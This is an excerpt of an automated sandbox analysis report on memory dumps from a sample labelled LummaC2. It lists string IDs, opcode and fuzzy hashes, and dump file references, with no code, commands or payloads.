                                              • String ID: i7
                                              • API String ID: 0-1271908578
                                              • Opcode ID: 1d092e72ec8373ba7c8767957e71b503b5b0495f908c172287ccf6c296b63c3d
                                              • Instruction ID: 15edbe013d57114da3ed1ee12d1c394de63bdcd42ee6453c5d6941dc05672f97
                                              • Opcode Fuzzy Hash: 1d092e72ec8373ba7c8767957e71b503b5b0495f908c172287ccf6c296b63c3d
                                              • Instruction Fuzzy Hash: 9A82E1B0614B809FD3A1CF3D8846793BFE8AB5A304F18495EE0EED7342D775A5048B66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ix
                                              • API String ID: 0-2137776124
                                              • Opcode ID: 32caea645dfd65487985fcb16cece808c5214e26833445aa8adfa1b0f66c7d91
                                              • Instruction ID: 9f917ef332da89ae3c90fe66b99d357b3fbe9fdf53f9c0f90a1de083672bfb6c
                                              • Opcode Fuzzy Hash: 32caea645dfd65487985fcb16cece808c5214e26833445aa8adfa1b0f66c7d91
                                              • Instruction Fuzzy Hash: C922DDB4608304CFD724DF65D8917ABB7F1EF85314F08982CE5969B3A1EB389944CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ix
                                              • API String ID: 0-2137776124
                                              • Opcode ID: 707ae9ea2071e1769d26a3f2d52d11a06ffeb1cbeff7639397d350578e17b1fd
                                              • Instruction ID: 4af38c41fbbfd2763191f3a39e4148ebfa25642d03c69a78194b1d97b8302d64
                                              • Opcode Fuzzy Hash: 707ae9ea2071e1769d26a3f2d52d11a06ffeb1cbeff7639397d350578e17b1fd
                                              • Instruction Fuzzy Hash: 2C22DDB4608304CFD724DF25D8917ABB7F1EF85314F08982CE5969B3A1E7389944CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2?
                                              • API String ID: 0-3250069207
                                              • Opcode ID: f2fc119536e03ccf7257c5a3d98e7f1d09557b7fa6a90078ec86f19c45c4fbea
                                              • Instruction ID: 6b12368d1cdc944e0acdd6e617ede77d3153693ba85a1959e1bbda500df4c7a2
                                              • Opcode Fuzzy Hash: f2fc119536e03ccf7257c5a3d98e7f1d09557b7fa6a90078ec86f19c45c4fbea
                                              • Instruction Fuzzy Hash: 93E10176609314CFC308CF29E8946AABBE2FBC8315F09897CE485A7391D774D949CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: f6b30f6269008b77b7207d85f67aaa309a76c3beddef89373f46131e65963537
                                              • Instruction ID: a639c16671f66a68976e7ef97fbb4937179e88dd09cbbe4f1a66ba6e946735d5
                                              • Opcode Fuzzy Hash: f6b30f6269008b77b7207d85f67aaa309a76c3beddef89373f46131e65963537
                                              • Instruction Fuzzy Hash: FA126921108BC28ED726CA3C8848356BF916B67224F1CC7DCE4F98F7D7C366915687A2
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E16FA9
                                              • Instruction Fuzzy Hash: B68137725083508BC324CF24C891767BBF0EF95318F29662DE8D6AB3A1E7799C45C792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $%&'
                                              • API String ID: 0-1447449905
                                              • Opcode ID: b7cdf62230e2c90fb59e1c1680c5fe7f288f4a2ceb1edbf7e93d68ad3c92bcc7
                                              • Instruction ID: 9491e7c3d31433dfa7af98d0cbdea9ec2f1534dcec79c6f106be84ca775cde88
                                              • Opcode Fuzzy Hash: b7cdf62230e2c90fb59e1c1680c5fe7f288f4a2ceb1edbf7e93d68ad3c92bcc7
                                              • Instruction Fuzzy Hash: D09138726082614BC716CE68C8902AFBBE1AB95324F19867DECF96B3D2C234DC45D7D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,
                                              • API String ID: 0-3772416878
                                              • Opcode ID: 7a9d055cfabe90afec6c5612542bf7b948ce648e01e6248f440c0145562d7db6
                                              • Instruction ID: 856250627fa3d983f52e4ab33b875dad78ab83be3b26885f3dba5049f55565b5
                                              • Opcode Fuzzy Hash: 7a9d055cfabe90afec6c5612542bf7b948ce648e01e6248f440c0145562d7db6
                                              • Instruction Fuzzy Hash: 71B14C701083859FC321CF58C98061BFBE0AFA9704F488A6DF5D997742D631E918CBA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: XQZ[
                                              • API String ID: 0-4268654964
                                              • Opcode ID: d24cd338cdab00d62140ad527650b79e3fdcd5666a22d500354e5f1b581296e1
                                              • Instruction ID: 9b36fb14132b50b26b3057d500fd4922335069264689ab44ed96a34d3618b7a4
                                              • Opcode Fuzzy Hash: d24cd338cdab00d62140ad527650b79e3fdcd5666a22d500354e5f1b581296e1
                                              • Instruction Fuzzy Hash: F981FF752047069FC724DF28C8A4A6ABBF1EF85358F14952CE9959B3E1E732EC10CB41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: [
                                              • API String ID: 0-784033777
                                              • Opcode ID: 36f43e051437452bb059b96fc497a7c74dfce69599b2f692ba8b74b9f6787a06
                                              • Instruction ID: 2f1394a150f95394499b6400104c7924e0c04fbfc5094d2f0dd0992675e494f4
                                              • Opcode Fuzzy Hash: 36f43e051437452bb059b96fc497a7c74dfce69599b2f692ba8b74b9f6787a06
                                              • Instruction Fuzzy Hash: A9A1C6726087508BC3249F3888853AEFBD1AFD5324F1A8A2DE9EDD73C1D67488418B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "
                                              • API String ID: 0-123907689
                                              • Opcode ID: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                              • Instruction ID: 23a390821e81995c2b31d4250a2f4c049965003d3bf4933f74d26212d5e5be9b
                                              • Opcode Fuzzy Hash: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                              • Instruction Fuzzy Hash: 2571D532A083554BD714CE38C88039EFBE3ABC5714F69A96DFC94AB391D235DD858782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 38bf0598cb9c4e89a7b80b4e9206e634f9086090b6a901b0e2f6cfa5415cd205
                                              • Instruction ID: 2d5fb6e5a52299e6fdc91464907fa1f0d30cd21ae2927047ce22b29a49e1b62d
                                              • Opcode Fuzzy Hash: 38bf0598cb9c4e89a7b80b4e9206e634f9086090b6a901b0e2f6cfa5415cd205
                                              • Instruction Fuzzy Hash: EA715A2370DAE04BD328993C6D203B9BA834BE2234F1DD76DE4F69B3D1D5658C059341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: C^LO
                                              • API String ID: 0-1953003389
                                              • Opcode ID: 51a99051666e6366e9575c404f5b9b1e976e658ed747f2edb0ff431c725c16f7
                                              • Instruction ID: 97260eb13abe24d0e0c0d917aae0d2ba29ce4dddfd875444c5307c3acf2a0647
                                              • Opcode Fuzzy Hash: 51a99051666e6366e9575c404f5b9b1e976e658ed747f2edb0ff431c725c16f7
                                              • Instruction Fuzzy Hash: B851D66010C3928BE3099B39906477BBFD1AFD6318F285A5DF0D6AB2C2C77989058B56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: C^LO
                                              • API String ID: 0-1953003389
                                              • Opcode ID: a244f1f884f43a0a00c87bafd528a6a9b9ca98b5e6fa0c65c3a0e0d7430595fd
                                              • Instruction ID: 0d05824f9a4670c4fec136e73369afbf648749597bd0694508f2032706ef0e3b
                                              • Opcode Fuzzy Hash: a244f1f884f43a0a00c87bafd528a6a9b9ca98b5e6fa0c65c3a0e0d7430595fd
                                              • Instruction Fuzzy Hash: A651D76010C3928BE3099B39906477BBFD1AFD7308F286A5DF0D6AB2D3C77985058B56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 5s4R
                                              • API String ID: 0-2387198633
                                              • Opcode ID: b1ab23e67621e9c8b78dbff951225af38f89a6a2989ecb6daedde0d6a90530a2
                                              • Instruction ID: b188554a08475474d6593e08fde3e9e4bddd16d4ee6ad8e0a891154337559462
                                              • Opcode Fuzzy Hash: b1ab23e67621e9c8b78dbff951225af38f89a6a2989ecb6daedde0d6a90530a2
                                              • Instruction Fuzzy Hash: 2E413572B183604FC324CF39898562BBBE29B89304F1EA52DE885EB756C634ED05C781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ol
                                              • API String ID: 0-1916562502
                                              • Opcode ID: 6e77bf268aada77bd48e73f12fe6a71e49e0a98ec8a171fe5c7093badc2df15f
                                              • Instruction ID: 14bf5f7a1ee5c17ae6a923402445672e5800a145525708e2bff12ff2497f3b71
                                              • Opcode Fuzzy Hash: 6e77bf268aada77bd48e73f12fe6a71e49e0a98ec8a171fe5c7093badc2df15f
                                              • Instruction Fuzzy Hash: 0D41923060D3D18AE3358F25D0147EBBBF0AB97308F94596DD1DD6B2D2CB75450A8B92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ?<
                                              • API String ID: 0-912802884
                                              • Opcode ID: 82210d7c2eb1432462ed15922beba3a98b53dd34e863a6f89886343555adefa1
                                              • Instruction ID: 2e7d12776adc31356dd469dfb8bf020407811db529a74e6b730dd70cf8cfdd08
                                              • Opcode Fuzzy Hash: 82210d7c2eb1432462ed15922beba3a98b53dd34e863a6f89886343555adefa1
                                              • Instruction Fuzzy Hash: 96313572A183488FD318DF61CC8536FBBE1EB85318F09C83DE58197381EA79D40A8B46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %
                                              • API String ID: 0-2567322570
                                              • Opcode ID: 2c335efa8df2447483d193197ba7560dbf023ad3e44ad07208bb63e282fc3bd4
                                              • Instruction ID: b4f372b80120ab526ea1d80229f53ff2974b01bd54cdfc57c7d7bed9cd758156
                                              • Opcode Fuzzy Hash: 2c335efa8df2447483d193197ba7560dbf023ad3e44ad07208bb63e282fc3bd4
                                              • Instruction Fuzzy Hash: BE21E47250C2914BDB08CF35C82937BBFD6AB9A31CF195A6DD4CAE7381DA34C9058746
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R<
                                              • API String ID: 0-1245693556
                                              • Opcode ID: f405abd5bead93992a9f9a802b14308d28037925863e874a4c161ab2fe1821fc
                                              • Instruction ID: 9beb1402be38ecbc104234a6d0669649bb8dce17bf3aa39c65a79648cdc8a4ab
                                              • Opcode Fuzzy Hash: f405abd5bead93992a9f9a802b14308d28037925863e874a4c161ab2fe1821fc
                                              • Instruction Fuzzy Hash: E511E376A18219CFCB049F21E8D8A6AFBB4FF4A704F0A546CD48677280D330DE98CB51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: @
                                              • API String ID: 2994545307-2766056989
                                              • Opcode ID: dc851a3a2f5042f14ec89f1629e5c17061f5083e40b8bfe050be3cbbb625382c
                                              • Instruction ID: a7278ac9856268033885f2bef89dd287af247e5d6846989b8006433e32549377
                                              • Opcode Fuzzy Hash: dc851a3a2f5042f14ec89f1629e5c17061f5083e40b8bfe050be3cbbb625382c
                                              • Instruction Fuzzy Hash: B521D7715043049FD318DF08D8C566BBBB4EF85328F14951CF968673E0E375A808CB96
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: R<
                                              • API String ID: 0-1245693556
                                              • Opcode ID: 8b03426f3b78ddeccafef4a10db32ebd8127a8a5499d5d3e09d58d01aa9ae1dc
                                              • Instruction ID: f636584eefff883028b209c2630b8bb1e0ccf4e8ce1b357594750e7c20e2dce8
                                              • Opcode Fuzzy Hash: 8b03426f3b78ddeccafef4a10db32ebd8127a8a5499d5d3e09d58d01aa9ae1dc
                                              • Instruction Fuzzy Hash: E8012679A0811ACFCB149F21E8D85A5FBB0FB0A704F4A24A8C50377284D330DED4CB10
                                              • Opcode ID: 36060551e181361981ef05aa4f73447f88943a552aa19e4aa6a5d7a036d11f10
                                              • Instruction ID: 1c2d4af9684176c3c61df4b7983037b6d459c6a152b5abc888601a2effbbd648
                                              • Opcode Fuzzy Hash: 36060551e181361981ef05aa4f73447f88943a552aa19e4aa6a5d7a036d11f10
                                              • Instruction Fuzzy Hash: 6781DF742042019FD714DF19D894A2ABBF1FF88718F15A62CE995AB3E0EB30EC11CB41
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bb3f87008a4c8762984d5add2577bc8c61f1e0ffb9d58cce90fbd405e5f3ce9
                                              • Instruction ID: 3d8134d70d0c0ce346f8cf9d44aba48d6d74d202a4ff28457b19d6c77daca557
                                              • Opcode Fuzzy Hash: 5bb3f87008a4c8762984d5add2577bc8c61f1e0ffb9d58cce90fbd405e5f3ce9
                                              • Instruction Fuzzy Hash: 4A615B3375DAA14B932C983D5C262AABAC34BD6234B2DD77EE1F2DB3E1E9644C054240
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
